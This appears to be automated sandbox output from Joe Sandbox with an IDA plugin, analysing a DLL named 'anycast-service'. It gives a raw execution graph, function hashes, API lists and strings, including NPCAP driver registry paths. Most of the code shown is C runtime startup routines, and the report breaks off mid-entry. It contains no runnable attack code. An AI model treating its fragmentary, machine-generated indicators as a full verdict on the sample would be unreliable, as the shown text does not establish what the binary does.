                                                                                                                              execution_graph 20265 7ff8b8011000 20266 7ff8b80162b0 33 API calls 20265->20266 20267 7ff8b8011011 20266->20267 20270 7ff8b8016618 20267->20270 20269 7ff8b801665d 20271 7ff8b8016632 20270->20271 20273 7ff8b801662b 20270->20273 20274 7ff8b8024be8 20271->20274 20273->20269 20277 7ff8b8024834 20274->20277 20284 7ff8b80284f8 EnterCriticalSection 20277->20284 17346 7ff8b8016328 17347 7ff8b8016331 __scrt_release_startup_lock 17346->17347 17349 7ff8b8016335 17347->17349 17350 7ff8b802447c 17347->17350 17351 7ff8b802449c 17350->17351 17371 7ff8b80244b3 17350->17371 17352 7ff8b80244ba 17351->17352 17353 7ff8b80244a4 17351->17353 17384 7ff8b80298c4 17352->17384 17355 7ff8b801e188 memcpy_s 13 API calls 17353->17355 17357 7ff8b80244a9 17355->17357 17381 7ff8b801dfd8 17357->17381 17365 7ff8b8024549 17367 7ff8b802425c 33 API calls 17365->17367 17366 7ff8b8024531 17368 7ff8b801e188 memcpy_s 13 API calls 17366->17368 17373 7ff8b8024565 17367->17373 17369 7ff8b8024536 17368->17369 17370 7ff8b8025c7c __free_lconv_num 13 API calls 17369->17370 17370->17371 17371->17349 17372 7ff8b8025c7c __free_lconv_num 13 API calls 17372->17371 17374 7ff8b8024597 17373->17374 17375 7ff8b80245b0 17373->17375 17379 7ff8b802456b 17373->17379 17376 7ff8b8025c7c __free_lconv_num 13 API calls 17374->17376 17377 7ff8b8025c7c __free_lconv_num 13 API calls 17375->17377 17378 7ff8b80245a0 17376->17378 17377->17379 17380 7ff8b8025c7c __free_lconv_num 13 API calls 17378->17380 17379->17372 17380->17371 17414 7ff8b801df28 17381->17414 17385 7ff8b80244bf 17384->17385 17386 7ff8b80298d1 17384->17386 17390 7ff8b802907c GetModuleFileNameW 17385->17390 17448 7ff8b802687c 17386->17448 17391 7ff8b80290c2 GetLastError 17390->17391 17392 7ff8b80290d6 17390->17392 17725 7ff8b801e118 17391->17725 17394 7ff8b801bafc 33 API calls 17392->17394 17396 7ff8b8029104 17394->17396 17395 7ff8b80290cf 17397 7ff8b8016290 _handle_error 8 API calls 17395->17397 17401 7ff8b8029115 17396->17401 17730 7ff8b802a0f4 17396->17730 17400 7ff8b80244d6 17397->17400 17402 7ff8b802425c 17400->17402 17733 7ff8b8028f68 17401->17733 17404 7ff8b802429a 17402->17404 17406 7ff8b8024300 17404->17406 17747 7ff8b802849c 17404->17747 17405 7ff8b80243ef 17408 7ff8b802441c 17405->17408 17406->17405 17407 7ff8b802849c 33 API calls 17406->17407 17407->17406 17409 7ff8b802446c 17408->17409 17410 7ff8b8024434 17408->17410 17409->17365 17409->17366 17410->17409 17411 7ff8b8028398 _invalid_parameter_noinfo_noreturn 13 API calls 17410->17411 17412 7ff8b8024462 17411->17412 17413 7ff8b8025c7c __free_lconv_num 13 API calls 17412->17413 17413->17409 17415 7ff8b8026924 _invalid_parameter_noinfo_noreturn 13 API calls 17414->17415 17416 7ff8b801df4d 17415->17416 17417 7ff8b801df5e 17416->17417 17422 7ff8b801e028 IsProcessorFeaturePresent 17416->17422 17417->17371 17423 7ff8b801e03b 17422->17423 17426 7ff8b801ddc4 17423->17426 17427 7ff8b801ddfe memcpy_s BuildCatchObjectHelperInternal 17426->17427 17428 7ff8b801de26 RtlCaptureContext RtlLookupFunctionEntry 17427->17428 17429 7ff8b801de60 RtlVirtualUnwind 17428->17429 17430 7ff8b801de96 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17428->17430 17429->17430 17431 7ff8b801dee8 BuildCatchObjectHelperInternal 17430->17431 17434 7ff8b8016290 17431->17434 17436 7ff8b8016299 17434->17436 17435 7ff8b80162a4 GetCurrentProcess TerminateProcess 17436->17435 17437 7ff8b8016a34 IsProcessorFeaturePresent 17436->17437 17438 7ff8b8016a4c 17437->17438 17443 7ff8b8016c28 RtlCaptureContext 17438->17443 17444 7ff8b8016c42 RtlLookupFunctionEntry 17443->17444 17445 7ff8b8016c58 RtlVirtualUnwind 17444->17445 17446 7ff8b8016a5f 17444->17446 17445->17444 17445->17446 17447 7ff8b8016a00 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17446->17447 17449 7ff8b8026892 17448->17449 17450 7ff8b802688d 17448->17450 17452 7ff8b802a208 _invalid_parameter_noinfo_noreturn 6 API calls 17449->17452 17455 7ff8b802689a 17449->17455 17451 7ff8b802a1c0 _invalid_parameter_noinfo_noreturn 6 API calls 17450->17451 17451->17449 17453 7ff8b80268b1 17452->17453 17453->17455 17456 7ff8b8028398 _invalid_parameter_noinfo_noreturn 13 API calls 17453->17456 17459 7ff8b8026914 17455->17459 17491 7ff8b8024eb8 17455->17491 17458 7ff8b80268c4 17456->17458 17460 7ff8b80268e2 17458->17460 17461 7ff8b80268d2 17458->17461 17473 7ff8b802964c 17459->17473 17463 7ff8b802a208 _invalid_parameter_noinfo_noreturn 6 API calls 17460->17463 17462 7ff8b802a208 _invalid_parameter_noinfo_noreturn 6 API calls 17461->17462 17470 7ff8b80268d9 17462->17470 17464 7ff8b80268ea 17463->17464 17465 7ff8b80268ee 17464->17465 17466 7ff8b8026900 17464->17466 17468 7ff8b802a208 _invalid_parameter_noinfo_noreturn 6 API calls 17465->17468 17469 7ff8b8026514 _invalid_parameter_noinfo_noreturn 13 API calls 17466->17469 17467 7ff8b8025c7c __free_lconv_num 13 API calls 17467->17455 17468->17470 17471 7ff8b8026908 17469->17471 17470->17467 17472 7ff8b8025c7c __free_lconv_num 13 API calls 17471->17472 17472->17455 17562 7ff8b802980c 17473->17562 17475 7ff8b8029675 17577 7ff8b8029358 17475->17577 17478 7ff8b802968f 17478->17385 17480 7ff8b802973b 17482 7ff8b8025c7c __free_lconv_num 13 API calls 17480->17482 17481 7ff8b80296a0 17481->17480 17591 7ff8b8029940 17481->17591 17482->17478 17485 7ff8b8029736 17486 7ff8b801e188 memcpy_s 13 API calls 17485->17486 17486->17480 17487 7ff8b8029798 17487->17480 17602 7ff8b802919c 17487->17602 17488 7ff8b802975b 17488->17487 17489 7ff8b8025c7c __free_lconv_num 13 API calls 17488->17489 17489->17487 17500 7ff8b802a590 17491->17500 17526 7ff8b802a548 17500->17526 17531 7ff8b80284f8 EnterCriticalSection 17526->17531 17563 7ff8b802982f 17562->17563 17564 7ff8b8029839 17563->17564 17617 7ff8b80284f8 EnterCriticalSection 17563->17617 17567 7ff8b80298ab 17564->17567 17570 7ff8b8024eb8 BuildCatchObjectHelperInternal 33 API calls 17564->17570 17567->17475 17571 7ff8b80298c3 17570->17571 17573 7ff8b8029916 17571->17573 17574 7ff8b802687c 33 API calls 17571->17574 17573->17475 17575 7ff8b8029900 17574->17575 17576 7ff8b802964c 43 API calls 17575->17576 17576->17573 17618 7ff8b801bafc 17577->17618 17579 7ff8b802936c 17580 7ff8b802938a 17579->17580 17581 7ff8b8029378 GetOEMCP 17579->17581 17582 7ff8b802939f 17580->17582 17583 7ff8b802938f GetACP 17580->17583 17581->17582 17582->17478 17584 7ff8b8025cbc 17582->17584 17583->17582 17585 7ff8b8025d07 17584->17585 17590 7ff8b8025ccb _invalid_parameter_noinfo_noreturn 17584->17590 17586 7ff8b801e188 memcpy_s 13 API calls 17585->17586 17588 7ff8b8025d05 17586->17588 17587 7ff8b8025cee HeapAlloc 17587->17588 17587->17590 17588->17481 17589 7ff8b8023dc0 _invalid_parameter_noinfo_noreturn 2 API calls 17589->17590 17590->17585 17590->17587 17590->17589 17592 7ff8b8029358 35 API calls 17591->17592 17593 7ff8b802996b 17592->17593 17595 7ff8b80299a8 IsValidCodePage 17593->17595 17600 7ff8b80299eb memcpy_s 17593->17600 17594 7ff8b8016290 _handle_error 8 API calls 17596 7ff8b802972f 17594->17596 17597 7ff8b80299b9 17595->17597 17595->17600 17596->17485 17596->17488 17598 7ff8b80299f0 GetCPInfo 17597->17598 17601 7ff8b80299c2 memcpy_s 17597->17601 17598->17600 17598->17601 17600->17594 17650 7ff8b8029468 17601->17650 17724 7ff8b80284f8 EnterCriticalSection 17602->17724 17619 7ff8b801bb1b 17618->17619 17620 7ff8b801bb20 17618->17620 17619->17579 17620->17619 17621 7ff8b80267a8 BuildCatchObjectHelperInternal 33 API calls 17620->17621 17622 7ff8b801bb3b 17621->17622 17626 7ff8b8026a50 17622->17626 17627 7ff8b801bb5e 17626->17627 17628 7ff8b8026a65 17626->17628 17630 7ff8b8026a84 17627->17630 17628->17627 17634 7ff8b802b140 17628->17634 17631 7ff8b8026a99 17630->17631 17632 7ff8b8026aac 17630->17632 17631->17632 17647 7ff8b8029924 17631->17647 17632->17619 17635 7ff8b80267a8 BuildCatchObjectHelperInternal 33 API calls 17634->17635 17636 7ff8b802b14f 17635->17636 17637 7ff8b802b19a 17636->17637 17646 7ff8b80284f8 EnterCriticalSection 17636->17646 17637->17627 17648 7ff8b80267a8 BuildCatchObjectHelperInternal 33 API calls 17647->17648 17649 7ff8b802992d 17648->17649 17651 7ff8b80294a5 GetCPInfo 17650->17651 17660 7ff8b802959b 17650->17660 17652 7ff8b80294b8 17651->17652 17651->17660 17661 7ff8b802c9e4 17652->17661 17653 7ff8b8016290 _handle_error 8 API calls 17654 7ff8b8029634 17653->17654 17654->17600 17660->17653 17662 7ff8b801bafc 33 API calls 17661->17662 17663 7ff8b802ca26 17662->17663 17681 7ff8b8029c24 17663->17681 17682 7ff8b8029c2c MultiByteToWideChar 17681->17682 17726 7ff8b8026924 _invalid_parameter_noinfo_noreturn 13 API calls 17725->17726 17727 7ff8b801e129 17726->17727 17728 7ff8b8026924 _invalid_parameter_noinfo_noreturn 13 API calls 17727->17728 17729 7ff8b801e142 17728->17729 17729->17395 17731 7ff8b8029ecc try_get_function 5 API calls 17730->17731 17732 7ff8b802a114 17731->17732 17732->17401 17734 7ff8b8028f8c 17733->17734 17735 7ff8b8028fa5 17733->17735 17734->17395 17736 7ff8b8029c80 WideCharToMultiByte 17735->17736 17738 7ff8b8028faa 17735->17738 17737 7ff8b8028ffd 17736->17737 17737->17738 17740 7ff8b8029004 GetLastError 17737->17740 17742 7ff8b802902d 17737->17742 17738->17734 17739 7ff8b801e188 memcpy_s 13 API calls 17738->17739 17739->17734 17741 7ff8b801e118 13 API calls 17740->17741 17744 7ff8b8029011 17741->17744 17743 7ff8b8029c80 WideCharToMultiByte 17742->17743 17745 7ff8b8029054 17743->17745 17746 7ff8b801e188 memcpy_s 13 API calls 17744->17746 17745->17734 17745->17740 17746->17734 17748 7ff8b8028424 17747->17748 17749 7ff8b801bafc 33 API calls 17748->17749 17750 7ff8b8028448 17749->17750 17750->17404 20494 7ff8b8027a4c 20497 7ff8b80279d0 20494->20497 20504 7ff8b80284f8 EnterCriticalSection 20497->20504 19057 7ff8b8027944 19058 7ff8b802794f 19057->19058 19066 7ff8b802c5b8 19058->19066 19079 7ff8b80284f8 EnterCriticalSection 19066->19079 20216 7ff8b80265e4 20217 7ff8b80265e9 20216->20217 20218 7ff8b80265fe 20216->20218 20222 7ff8b8026604 20217->20222 20223 7ff8b802664e 20222->20223 20224 7ff8b8026646 20222->20224 20226 7ff8b8025c7c __free_lconv_num 13 API calls 20223->20226 20225 7ff8b8025c7c __free_lconv_num 13 API calls 20224->20225 20225->20223 20227 7ff8b802665b 20226->20227 20228 7ff8b8025c7c __free_lconv_num 13 API calls 20227->20228 20229 7ff8b8026668 20228->20229 20230 7ff8b8025c7c __free_lconv_num 13 API calls 20229->20230 20231 7ff8b8026675 20230->20231 20232 7ff8b8025c7c __free_lconv_num 13 API calls 20231->20232 20233 7ff8b8026682 20232->20233 20234 7ff8b8025c7c __free_lconv_num 13 API calls 20233->20234 20235 7ff8b802668f 20234->20235 20236 7ff8b8025c7c __free_lconv_num 13 API calls 20235->20236 20237 7ff8b802669c 20236->20237 20238 7ff8b8025c7c __free_lconv_num 13 API calls 20237->20238 20239 7ff8b80266a9 20238->20239 20240 7ff8b8025c7c __free_lconv_num 13 API calls 20239->20240 20241 7ff8b80266b9 20240->20241 20242 7ff8b8025c7c __free_lconv_num 13 API calls 20241->20242 20243 7ff8b80266c9 20242->20243 20248 7ff8b80264b4 20243->20248 20262 7ff8b80284f8 EnterCriticalSection 20248->20262

                                                                                                                              Executed Functions

                                                                                                                              Function 00007FF8B8012990 Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 134registrymemorysynchronizationCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$CloseProcess$CreateErrorFileFreeHandleLastMutexQueryValue$AllocInfoModuleNameOpenSizeVersion
                                                                                                                              • String ID: LoopbackAdapter$LoopbackSupport$NPCAP$NPCAP$SYSTEM\CurrentControlSet\Services\NPCAP\Parameters$drivers\NPCAP.sys
                                                                                                                              • API String ID: 1573443129-4236000593
                                                                                                                              • Opcode ID: 2ddd36cef773a513d6664fe05fbb0d9f00fd8a8ed3ef776c3b4ce1fe556c19e9
                                                                                                                              • Instruction ID: 91ad71fa5b04aead902fa9b05f4ee15415d3f7f9121b659325ae13ddba19f5f5
                                                                                                                              • Opcode Fuzzy Hash: 2ddd36cef773a513d6664fe05fbb0d9f00fd8a8ed3ef776c3b4ce1fe556c19e9
                                                                                                                              • Instruction Fuzzy Hash: 02615D35A58A8281EF60DF1AE8442AA63A1FF887E4F444135EB5D07AE4DF3CE107C708
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8013010 Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 137memoryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$Process$ErrorFreeLast$AllocFileInfoQueryValueVersion$ByteCharMultiSizeWide
                                                                                                                              • String ID: \StringFileInfo\%04x%04x\FileVersion$\VarFileInfo\Translation
                                                                                                                              • API String ID: 70495082-2452293203
                                                                                                                              • Opcode ID: ce382a739ba15e69c3e69c0b1dc84b13d1337ebf699761985dd96d9cde63f6e3
                                                                                                                              • Instruction ID: bcee10393ea6281ca8a4cb5ba78ea31a8fbcb9a33c76ec8d708c0f6ccd9c3c5c
                                                                                                                              • Opcode Fuzzy Hash: ce382a739ba15e69c3e69c0b1dc84b13d1337ebf699761985dd96d9cde63f6e3
                                                                                                                              • Instruction Fuzzy Hash: DD516021A08A8786EF149BAAA8543BA63A1FF8DBD0F444535EB4E437D4DF7CD40B8314
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B80166A0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 57 7ff8b80166a0-7ff8b80166a6 58 7ff8b80166a8-7ff8b80166ab 57->58 59 7ff8b80166e1-7ff8b80166eb 57->59 60 7ff8b80166ad-7ff8b80166b0 58->60 61 7ff8b80166d5-7ff8b801670d call 7ff8b8016458 58->61 62 7ff8b8016808-7ff8b801681d 59->62 63 7ff8b80166c8 __scrt_dllmain_crt_thread_attach 60->63 64 7ff8b80166b2-7ff8b80166b5 60->64 76 7ff8b8016712-7ff8b8016714 61->76 65 7ff8b801682c-7ff8b8016846 call 7ff8b80162ec 62->65 66 7ff8b801681f 62->66 72 7ff8b80166cd-7ff8b80166d4 63->72 68 7ff8b80166c1-7ff8b80166c6 call 7ff8b801639c 64->68 69 7ff8b80166b7-7ff8b80166c0 64->69 78 7ff8b8016848-7ff8b801687d call 7ff8b8016414 call 7ff8b80170b0 call 7ff8b801711c call 7ff8b80165c8 call 7ff8b80165ec call 7ff8b8016444 65->78 79 7ff8b801687f-7ff8b80168b0 call 7ff8b8016e9c 65->79 70 7ff8b8016821-7ff8b801682b 66->70 68->72 80 7ff8b801671a-7ff8b801672f call 7ff8b80162ec 76->80 81 7ff8b80167e2 76->81 78->70 91 7ff8b80168c1-7ff8b80168c7 79->91 92 7ff8b80168b2-7ff8b80168b8 79->92 89 7ff8b80167fa-7ff8b8016807 call 7ff8b8016e9c 80->89 90 7ff8b8016735-7ff8b8016746 call 7ff8b801635c 80->90 85 7ff8b80167e4-7ff8b80167f9 81->85 89->62 107 7ff8b8016748-7ff8b801676c call 7ff8b80170e0 call 7ff8b80170a0 call 7ff8b80170bc call 7ff8b8024e44 90->107 108 7ff8b8016797-7ff8b80167a1 call 7ff8b80165c8 90->108 97 7ff8b80168c9-7ff8b80168d3 91->97 98 7ff8b801690e-7ff8b8016916 call 7ff8b8012990 91->98 92->91 96 7ff8b80168ba-7ff8b80168bc 92->96 103 7ff8b80169af-7ff8b80169bc 96->103 104 7ff8b80168df-7ff8b80168ed 97->104 105 7ff8b80168d5-7ff8b80168dd 97->105 109 7ff8b801691b-7ff8b8016924 98->109 110 7ff8b80168f3-7ff8b80168fb call 7ff8b80166a0 104->110 121 7ff8b80169a5-7ff8b80169ad 104->121 105->110 107->108 157 7ff8b801676e-7ff8b8016775 __scrt_dllmain_after_initialize_c 107->157 108->81 129 7ff8b80167a3-7ff8b80167af call 7ff8b80170d8 108->129 117 7ff8b801695c-7ff8b801695e 109->117 118 7ff8b8016926-7ff8b8016928 109->118 123 7ff8b8016900-7ff8b8016908 110->123 119 7ff8b8016960-7ff8b8016963 117->119 120 7ff8b8016965-7ff8b801697a call 7ff8b80166a0 117->120 118->117 126 7ff8b801692a-7ff8b801694c call 7ff8b8012990 call 7ff8b8016808 118->126 119->120 119->121 120->121 138 7ff8b801697c-7ff8b8016986 120->138 121->103 123->98 123->121 126->117 152 7ff8b801694e-7ff8b8016953 126->152 146 7ff8b80167b1-7ff8b80167bb call 7ff8b8016530 129->146 147 7ff8b80167d5-7ff8b80167e0 129->147 143 7ff8b8016988-7ff8b801698f 138->143 144 7ff8b8016991-7ff8b80169a1 138->144 143->121 144->121 146->147 156 7ff8b80167bd-7ff8b80167cb 146->156 147->85 152->117 156->147 157->108 158 7ff8b8016777-7ff8b8016794 call 7ff8b8024de0 157->158 158->108
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 190073905-0
                                                                                                                              • Opcode ID: b1bb8ee604ff9fc03d047a1889e1710a55496d08dd81a2e5f2f3a941b65b6436
                                                                                                                              • Instruction ID: 714152eda151e5ef2e56fa95a721371f9203dc3a838072694b3022fac17419f8
                                                                                                                              • Opcode Fuzzy Hash: b1bb8ee604ff9fc03d047a1889e1710a55496d08dd81a2e5f2f3a941b65b6436
                                                                                                                              • Instruction Fuzzy Hash: 9A819A61E08643C6FE90BB6ED8412BA6694AF897E0F144135FB6D437D6DF3CE4478608
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8027B6C Relevance: 3.1, APIs: 2, Instructions: 73COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileHandleType
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3000768030-0
                                                                                                                              • Opcode ID: a2b401eee2d456bcffbf97179f53e8dd7ac909ce33f63d20787170bc4c901e0c
                                                                                                                              • Instruction ID: 64f182df342c0e39bbdbd98d946c43dc6dd4269784808e7a81d7cce12092cd32
                                                                                                                              • Opcode Fuzzy Hash: a2b401eee2d456bcffbf97179f53e8dd7ac909ce33f63d20787170bc4c901e0c
                                                                                                                              • Instruction Fuzzy Hash: 04318022A18A46C1EB648F2989A017D2650FB45BF0F741339DB6E073E0CF78E463D748
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B802CC6C Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3215553584-0
                                                                                                                              • Opcode ID: b371f66ff41fcb995b1c9071a21c50858a6ede7eeebb702765ba59472e1e2318
                                                                                                                              • Instruction ID: 8586cabb0fee195bf3cdc4ddd3b882a9627821dcc6c73897ea0a87a0f70eca79
                                                                                                                              • Opcode Fuzzy Hash: b371f66ff41fcb995b1c9071a21c50858a6ede7eeebb702765ba59472e1e2318
                                                                                                                              • Instruction Fuzzy Hash: 7811663290C64682FB10AF1DA44057DA6A0FB847C0F650139EB5D97BE2DFBCE8138B48
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8028398 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF8B8026981,?,?,?,00007FF8B801E191,?,?,?,?,00007FF8B8025CA1), ref: 00007FF8B80283ED
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateHeap
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1279760036-0
                                                                                                                              • Opcode ID: 29517b2cff29842df447023366aaf5b96e08377ee10570ee5a0a59faacc4d174
                                                                                                                              • Instruction ID: 4996605e8c9eff3b4a199b85db9338302b46cc3eafedb5cd66f363c3363f7558
                                                                                                                              • Opcode Fuzzy Hash: 29517b2cff29842df447023366aaf5b96e08377ee10570ee5a0a59faacc4d174
                                                                                                                              • Instruction Fuzzy Hash: 1FF03759F0D20685FE555A6A98122BE52809F5CBC0F485430CF0E866D1EFBCE4638218
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8016458 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __scrt_dllmain_crt_thread_attach
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2860701742-0
                                                                                                                              • Opcode ID: a574a7d04db6ef777a5bfcbae4c30c6ca5dc5c3aa9470405bcc4e31d1f2f6a89
                                                                                                                              • Instruction ID: efe147ed343aecb735cf049bcf0ee0e3c848cc0bfcd1bb14cbfaece3d60bd6a2
                                                                                                                              • Opcode Fuzzy Hash: a574a7d04db6ef777a5bfcbae4c30c6ca5dc5c3aa9470405bcc4e31d1f2f6a89
                                                                                                                              • Instruction Fuzzy Hash: A4E09A91D4C282C6FE6536AD68922BB03840F2A3E0F4000B8FBAE431C38F3D744B156C
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Non-executed Functions

                                                                                                                              Function 00007FF8B8013240 Relevance: 112.4, APIs: 56, Strings: 8, Instructions: 375registrymemoryserviceCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
